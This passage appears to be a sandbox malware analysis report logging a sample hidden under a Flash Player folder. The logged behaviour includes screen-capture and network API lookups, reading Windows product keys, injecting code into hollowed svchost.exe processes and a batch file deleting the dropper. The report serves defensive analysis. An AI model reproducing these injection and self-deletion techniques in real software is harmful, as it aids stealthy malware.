| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x76950000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
3 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x77d0ce41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x77cd00a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x77ccf9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77cd1314 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x77cd19b0 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = extended |
|
1 | |
| Mutex | Create | mutex_name = C2E6ECE9938A43206F172A85684E36DB |
|
1 | |
| Mutex | Open | mutex_name = 9B4D68961731FE3C22DA08B640799EB6, desired_access = SYNCHRONIZE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Mutex | Open | mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x638, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = A63A6CDA308CF3B4F10C6B82D6B9EA5B |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 | |
| Mutex | Open | mutex_name = 20BC29E135FB9B01285187E3B5593CC8, desired_access = SYNCHRONIZE |
|
2 | |
| Process | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, os_pid = 0x7e0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Mutex | Create | mutex_name = 629BC138D148FEC80DAF76D454EF252E |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x70000, size = 114688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x876c4, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x877d0, size = 4 |
|
1 | |
| Memory | Write | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, address = 0x87d38, size = 4 |
|
1 | |
| Thread | Create | process_name = C:\Windows\SysWOW64\svchost.exe -k netsvcs, proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY |
|
1 |
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:05:38, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:35 |
| Information | Value |
|---|---|
| PID | 0x6a4 |
| Parent PID | 0x594 (c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
464
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x001d0000 | 0x00236fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000240000 | 0x00240000 | 0x00240fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000340000 | 0x00340000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000530000 | 0x00530000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00947fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000950000 | 0x00950000 | 0x00ad0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x01edffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001ee0000 | 0x01ee0000 | 0x02222fff | Pagefile Backed Memory | Readable |
|
|
|
|
| cmd.exe | 0x4a530000 | 0x4a57bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winbrand.dll | 0x756d0000 | 0x756d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-01-10 18:57:08 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 55271 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a530000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x759ea84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x759d4a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x759ea79d |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x77762102 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x77763352 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SaferCloseLevel, address_out = 0x77763825 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 216 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 205 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 201 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 135 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 63 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
2 | |
| File | Write | filename = STD_ERROR_HANDLE, size = 33 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:07:38, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:35 |
| Information | Value |
|---|---|
| PID | 0x638 |
| Parent PID | 0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6FC
0x
538
0x
760
0x
594
0x
7BC
0x
74C
0x
548
0x
7D8
0x
7A8
